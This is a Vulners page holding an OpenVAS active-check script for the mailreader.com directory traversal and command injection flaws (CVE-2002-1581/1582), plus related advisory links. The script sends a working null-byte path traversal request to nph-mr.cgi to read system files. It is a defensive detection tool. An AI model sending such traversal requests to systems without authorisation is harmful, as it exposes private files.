mailreader.com < 2.3.32 Multiple Vulnerabilities (Aug/Oct 2002) - Active Check
🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2005 Michel ArboiType
openvas🔗 plugins.openvas.org👁 34 Views
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CAN-2002-1581 | 6 Aug 202410:01 | – | cve | |
| CVE-2002-1581 | 6 Jul 200404:00 | – | cve | |
| CVE-2002-1582 | 6 Jul 200404:00 | – | cve | |
| CVE-2002-1581 | 6 Jul 200404:00 | – | cvelist | |
| CVE-2002-1582 | 6 Jul 200404:00 | – | cvelist | |
| [SECURITY] [DSA 534-1] New mailreader packages fix directory traversal vulnerability | 23 Jul 200403:54 | – | debian | |
| Debian DSA-534-1 : mailreader - directory traversal | 29 Sep 200400:00 | – | nessus | |
| Mailreader 2.3.30 - 2.3.31 Multiple Vulnerabilities | 26 Jun 200300:00 | – | nessus | |
| MailReader.com 2.3.x - 'NPH-MR.cgi' File Disclosure | 28 Oct 200200:00 | – | exploitdb | |
| EUVD-2002-1562 | 7 Oct 202500:30 | – | euvd |
10
# SPDX-FileCopyrightText: 2005 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.11780");
script_version("2025-09-12T05:38:45+0000");
script_tag(name:"last_modification", value:"2025-09-12 05:38:45 +0000 (Fri, 12 Sep 2025)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_cve_id("CVE-2002-1581", "CVE-2002-1582");
script_xref(name:"URL", value:"https://web.archive.org/web/20210121155251/http://www.securityfocus.com/bid/5393");
script_xref(name:"URL", value:"https://web.archive.org/web/20210121155608/http://www.securityfocus.com/bid/6055");
script_xref(name:"URL", value:"https://web.archive.org/web/20210121155609/http://www.securityfocus.com/bid/6058");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_name("mailreader.com < 2.3.32 Multiple Vulnerabilities (Aug/Oct 2002) - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2005 Michel Arboi");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl",
"DDI_Directory_Scanner.nasl", "os_detection.nasl",
"global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"summary", value:"mailreader.com is prone to multiple vulnerabilities.");
script_tag(name:"insight", value:"The following flaws exist:
- CVE-2002-1581: Directory traversal vulnerability in nph-mr.cgi allows remote attackers to view
arbitrary files via .. (dot dot) sequences and a null byte (%00) in the configLanguage parameter.
- CVE-2002-1582: compose.cgi, when using Sendmail as the Mail Transfer Agent, allows remote
attackers to execute arbitrary commands via shell metacharacters in the RealEmail configuration
variable, which is used to call Sendmail in network.cgi.");
script_tag(name:"solution", value:"Update to version 2.3.32 or later.");
script_tag(name:"qod_type", value:"remote_banner");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("host_details.inc");
include("os_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
include("traversal_func.inc");
port = http_get_port(default: 80);
foreach dir (make_list_unique("/", http_cgi_dirs(port: port))) {
if (dir == "/")
dir = "";
req = http_get(item: dir + "/nph-mr.cgi?do=loginhelp&configLanguage=english", port: port);
res = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);
if (!res || "Powered by Mailreader.com" >!< res)
continue;
files = traversal_files();
foreach pattern(keys(files)) {
file = files[pattern];
url = strcat(dir, "/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../", file, "%00");
r = http_get(port: port, item: url);
r2 = http_keepalive_send_recv(port: port, data: r);
if(!r2)
continue;
if (egrep(string: r2, pattern: pattern, icase: TRUE)) {
report = http_report_vuln_url(port: port, url: url);
security_message(port: port, data: report);
exit(0);
}
}
if (res =~ "Powered by Mailreader\.com v2\.3\.3[01]" || res =~ "Powered by Mailreader\.com v2\.([01]\.*|2\.([0-2]\..*|3\.([0-9][^0-9]|[12][0-9])))") {
security_message(port: port);
exit(0);
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Sep 2025 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 210
EPSS0.0764